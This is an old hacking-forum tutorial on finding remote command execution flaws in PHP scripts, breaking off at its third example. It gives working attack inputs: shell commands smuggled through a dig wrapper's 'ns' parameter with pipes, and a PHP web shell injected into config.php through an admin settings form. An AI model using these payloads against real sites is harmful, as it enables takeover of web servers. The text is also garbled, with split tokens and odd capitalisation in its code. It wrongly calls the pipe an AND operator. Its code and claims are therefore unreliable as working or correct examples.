How to find RCE in scripts (with examples)

How to find RCE in scripts (with examples )----------------
---------------- By SirGod ----------------
---------------- Www.insecurity-ro.org ----------------
---------------- Www.h4cky0u.org ----------------

-In this tutorial I will show you how to find Remote Command Execution vulnerabilities
In PHP Web Applications (scripts ).
-Through Remote Command Execution vulnerabilities you can execute commands on
Webserver.
-I will present 4 examples + the basic one.
-I will start with a basic example.
 
File: index. php
 
Code snippet:
 
<? Php
$ Cmd = $ _ GET [cmd];
System ($ cmd );
?>

So if we do the following request

Index. php? Cmd = whoami

Our command will be executed.

In PHP is more functions that let you to execute commands:
 
Exec-Execute an external program
Passthru-Execute an external program and display raw output
Shell_exec-Execute command via shell and return the complete output as a string
System-Execute an external program and display the output

If in script is used exec () you cant see the command output (but the command is executed)
Until the result isnt echoed from script. Example:

<? Php
$ Cmd = $ _ GET [cmd];
Echo exec ($ cmd );
?>

But this is only an basic example of Remote Command Execution. You will neved find this
In PHP scripts unless the coder is a monkey.

1)-Lets start with an real-life example. All the following examples is real-life.All
Them are discovered by me in different php scripts.

The 1st example is an whois lookup script, they execute command in terminal to do that.
Works only on * NIX systems.
 
Lets take a look in dig. php file:

Code snippet:

<? Php

Include ("common. php ");
ShowMenu ();
Echo <br>;
$ Status = $ _ GET [status];
$ Ns = $ _ GET [ns];
$ Host = $ _ GET [host];
$ Query_type = $ _ GET [query_type]; // ANY, MX, A, etc.
$ Ip = $ _ SERVER [REMOTE_ADDR];
$ Self = $ _ SERVER [PHP_SELF];

........................................ ........................................ ..

$ Host = trim ($ host );
$ Host = strtolower ($ host );
Echo ("<span class =" plainBlue "> <B> Executing: <u> dig @ $ ns $ host $ query_type </u> </B> <br> ");
Echo <pre>;
// Start digging in the namserver
System ("dig @ $ ns $ host $ query_type ");
Echo </pre>;
} Else {
?>
 
We are interested in these lines:

$ Ns = $ _ GET [ns];
System ("dig @ $ ns $ host $ query_type ");
 
The "ns" variable is unfiltered and can be modified by user. An attacker can use any command
That he want through this variable. We can execute commands like in the previous example.
If we request:

Dig. php? Ns = whoam & host = sirgod.net & query_type = NS & status = digging

Will not work. Why? The code will be
 
System ("dig whoami sirgod.com NS ");

And that command dont exist and the execution will fail. What to do to work? In * NIX systems
We have the AND operator who can be used in terminal. That operator is |. So if we make
Request like this:

Dig. php? Ns = | whoami | & host = sirgod.net & query_type = NS & status = digging

Our command will be succesfully executed. Look at the code:

System ("dig | whoami | sirgod.net NS ");

Will execute the command separately than "dig" and the other.

2)-Lets continue with another example, little bit complicated than first.

Some scripts let you to modify the configuration of website after install. Bad mistake
Because usually configuration files is. php.

So we have the script instaled. We look in the admin. php file
 
Code snippet:

If (isset ($ action) & $ action = "setconfig "){
$ Config_file = "config. php ";
$ Handle = fopen ($ config_file, w );
$ StringData = "<? Php
$ "." News_width = ". clean ($ _ POST [news_width]).";
$ "." Bgcolor = ". clean ($ _ POST [bgcolor]).";
$ "." Fgcolor = ". clean ($ _ POST [fgcolor]).";
$ "." Padding = ". clean ($ _ POST [padding]).";
$ "." Subject_margin = ". clean ($ _ POST [subject_margin]).";
$ "." Fontname = ". clean ($ _ POST [fontname]).";
$ "." Fontsize = ". clean ($ _ POST [fontsize]).";?> ";
Fwrite ($ handle, $ StringData );
}

We see here that the script save the settings in config. php file.

Now lets see the config. php file content:

Code snippet:

<? Php
$ News_width = 600px;
$ Bgcolor = #000000;
$ Fgcolor = # ffffff;
$ Padding = 5px;
$ Subject_margin = 0px;
$ Fontname = verdana;
$ Fontsize = 13px;
?>

So we cand inject php code in news_width for example. Now, the things will be
More complicated. We can inject our code but we must pay attention to the code.
I will show you an example to understand what I say.

We will inject the following php code in news_width variable. The code will be
Written into config. php file. Lets go to admin. php? Action = setconfig file and
Inject the code.

Code:

<? Php system ($ _ GET [cmd]);?>

The code will become:
 
<? Php
$ News_width = <? Php system ($ _ GET [cmd]);?>;
$ Bgcolor = #000000;
$ Fgcolor = # ffffff;
$ Padding = 5px;
$ Subject_margin = 0px;
$ Fontname = verdana;
$ Fontsize = 13px;
?>
 
And that is wrong. If we request the config. php file we will get an parse error:
 
Parse error: parse error in C: wampwwwconfig. php on line 3

So we must inject something more complicated.
 
; System ($ _ GET [cmd]);

Why this code? Look, the code inside config. php file will become:
 
<? Php
$ News_width =; system ($ _ GET [cmd]);
$ Bgcolor = #000000;
$ Fgcolor = # ffffff;
$ Padding = 5px;
$ Subject_margin = 0px;
$ Fontname = verdana;
$ Fontsize = 13px;
?>
 
Lets split it:

$ News_width =;
System ($ _ GET [cmd]);
;
 
No parse error, so we can succesfully execute our commands. Lets make the request:
 
Config. php? Cmd = whoami
 
No more | because we dont need, only our command is executed.
 
 
3)-Lets go to the next example. In this script the news are saved in news.txt file.